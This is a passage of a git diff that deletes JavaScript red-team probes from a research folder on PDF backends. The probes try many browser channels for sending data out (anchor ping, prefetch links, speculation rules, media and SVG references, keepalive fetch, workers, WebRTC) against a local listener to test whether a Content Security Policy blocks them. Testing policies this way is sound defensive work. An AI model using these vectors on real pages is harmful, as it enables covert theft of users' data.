t("formsubmit", () => { - const sink = document.createElement("iframe"); - sink.name = tag + "-formsink"; - sink.style.display = "none"; - document.body.appendChild(sink); - const f = document.createElement("form"); - f.method = "POST"; - f.action = U("form"); - f.target = sink.name; - const inp = document.createElement("input"); - inp.name = "secret"; - inp.value = "BILLTEXT"; - f.appendChild(inp); - document.body.appendChild(f); - f.submit(); - }); - - // SERVICE WORKER -- registration is itself a network fetch of the script. - await t("serviceworker", () => { - if (!navigator.serviceWorker) throw new DOMException("unsupported", "NotSupportedError"); - return navigator.serviceWorker.register(U("sw")); - }); - - // WORKER-ORIGINATED FETCH -- a separate context from the document. - await t("workerfetch", () => { - const src = `fetch("${U("workerfetch")}",{mode:"no-cors"}).catch(function(){});`; - const blob = new Blob([src], { type: "text/javascript" }); - const w = new Worker(URL.createObjectURL(blob)); - setTimeout(() => w.terminate(), 1500); - }); - - // WEBRTC -- a STUN binding request is UDP; see serve.py's UDP listener. - await t("webrtc", () => { - const p = new RTCPeerConnection({ iceServers: [{ urls: "stun:127.0.0.1:8973" }] }); - p.createDataChannel("x"); - return p.createOffer().then((o) => p.setLocalDescription(o)); - }); - - await new Promise((r) => setTimeout(r, 2500)); - return out.join("\n"); -}; diff --git a/docs/research/pdf-backend-bakeoff/probes/vectors2.js b/docs/research/pdf-backend-bakeoff/probes/vectors2.js deleted file mode 100644 index 99e93a26..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/vectors2.js +++ /dev/null @@ -1,150 +0,0 @@ -// Red-team round 2: exfiltration mechanisms the first harness never attempted. -// -// The published claim is "no subresource or background network egress ... across every -// mechanism CSP governs". That claim is only as good as the vector list, and the first -// list was 16 mechanisms chosen by the same person who wrote the policy. These are the -// ones that list missed, several of which are governed by directives the proposed policy -// does not set at all. -// -// Every vector carries the marker BILLTEXT so the receiving server can attribute it. -window.__tryAll2 = async function (tag) { - const U = (v) => `http://127.0.0.1:8973/${tag}-${v}?secret=BILLTEXT`; - const out = []; - const t = async (name, fn) => { - try { - await fn(); - out.push(name + ":attempted"); - } catch (e) { - out.push(name + ":threw(" + e.name + ")"); - } - }; - - // -- governed by connect-src, but frequently forgotten. - await t("anchorping", () => { - const a = document.createElement("a"); - a.href = "#"; - a.ping = U("ping"); - document.body.appendChild(a); - a.click(); - }); - - // Speculation Rules -- prefetch/prerender a cross-origin URL. Governed by - // `script-src` for the rule block itself, and by default-src/prefetch-src for the - // fetch. A policy written before this API existed will not mention it. - await t("speculationrules", () => { - const s = document.createElement("script"); - s.type = "speculationrules"; - s.textContent = JSON.stringify({ prefetch: [{ source: "list", urls: [U("speculation")] }] }); - document.head.appendChild(s); - }); - - // Resource hints. `prefetch-src` was removed from CSP; these fall back to default-src - // in some engines and to nothing in others. - for (const rel of ["prefetch", "preload", "dns-prefetch", "preconnect"]) { - await t("link-" + rel, () => { - const l = document.createElement("link"); - l.rel = rel; - l.href = U("link-" + rel); - if (rel === "preload") l.as = "fetch"; - document.head.appendChild(l); - }); - } - - // / -- object-src. - await t("object", () => { - const o = document.createElement("object"); - o.data = U("object"); - document.body.appendChild(o); - }); - await t("embed", () => { - const e = document.createElement("embed"); - e.src = U("embed"); - document.body.appendChild(e); - }); - - // Media -- media-src, which the proposed policy does not set (default-src covers it, - // but only if default-src is actually 'none'). - await t("video", () => { - const v = document.createElement("video"); - v.src = U("video"); - v.autoplay = true; - document.body.appendChild(v); - v.load(); - }); - await t("track", () => { - const v = document.createElement("video"); - const tr = document.createElement("track"); - tr.src = U("track"); - tr.kind = "subtitles"; - tr.default = true; - v.appendChild(tr); - document.body.appendChild(v); - }); - - // SVG external references. - await t("svgimage", () => { - document.body.insertAdjacentHTML( - "beforeend", - ``, - ); - }); - await t("svguse", () => { - document.body.insertAdjacentHTML( - "beforeend", - ``, - ); - }); - - // CSS background-image -- img-src. - await t("cssbg", () => { - const s = document.createElement("style"); - s.textContent = `.bgx{background-image:url("${U("cssbg")}")}`; - document.head.appendChild(s); - const d = document.createElement("div"); - d.className = "bgx"; - d.textContent = "."; - document.body.appendChild(d); - }); - - // fetch with keepalive -- survives page teardown, the classic exfil-on-unload trick. - await t("keepalive", () => fetch(U("keepalive"), { mode: "no-cors", keepalive: true })); - - // WebTransport -- HTTP/3; governed by connect-src. - await t("webtransport", () => { - if (typeof WebTransport === "undefined") throw new DOMException("n/a", "NotSupportedError"); - new WebTransport("https://127.0.0.1:8973/" + tag + "-webtransport"); - }); - - // importScripts from inside a worker (distinct from the worker's own fetch). - await t("importscripts", () => { - const src = `try{importScripts("${U("importscripts")}")}catch(e){}`; - const w = new Worker(URL.createObjectURL(new Blob([src], { type: "text/javascript" }))); - setTimeout(() => w.terminate(), 1200); - }); - - //